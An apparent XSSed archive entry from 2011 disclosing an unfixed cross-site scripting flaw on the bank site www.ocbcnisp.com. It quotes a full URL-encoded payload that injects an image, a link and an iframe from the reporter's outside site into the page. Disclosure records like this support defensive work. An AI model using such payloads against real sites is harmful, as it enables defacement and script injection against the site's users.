Unfixed XSS vulnerability at www.ocbcnisp.com

2011-09-20T00:00:00
ID XSSED:73998
Type xssed
Reporter SPYRO KiD
Modified 2011-12-13T00:00:00

Description

Security researcher SPYRO KiD, has submitted on 20/09/2011 a cross-site-scripting (XSS) vulnerability affecting www.ocbcnisp.com, which at the time of submission ranked 222693 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 13/12/2011. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail.

Vulnerable URL: http://www.ocbcnisp.com/?opt=search&search=%22%3E%3C/head%3E%3Cbody%3E%3Ccenter%3E%3Ca%20href=%22http://www.spyrozone.net/%22%3E%3Cimg%20border=%220%22%20src=%22http://www.spyrozone.net/playground/xssedbyspyrozone.net.png%22%3E%3C/a%3E%3Cbr%3E%3Ciframe%20width=800%20height=600%20src=http://www.spyrozone.net%3E%3C/iframe%3E%3C/center%3E%3C/body%3E%3Cnoscript%3E&x=0&y=0&lang=1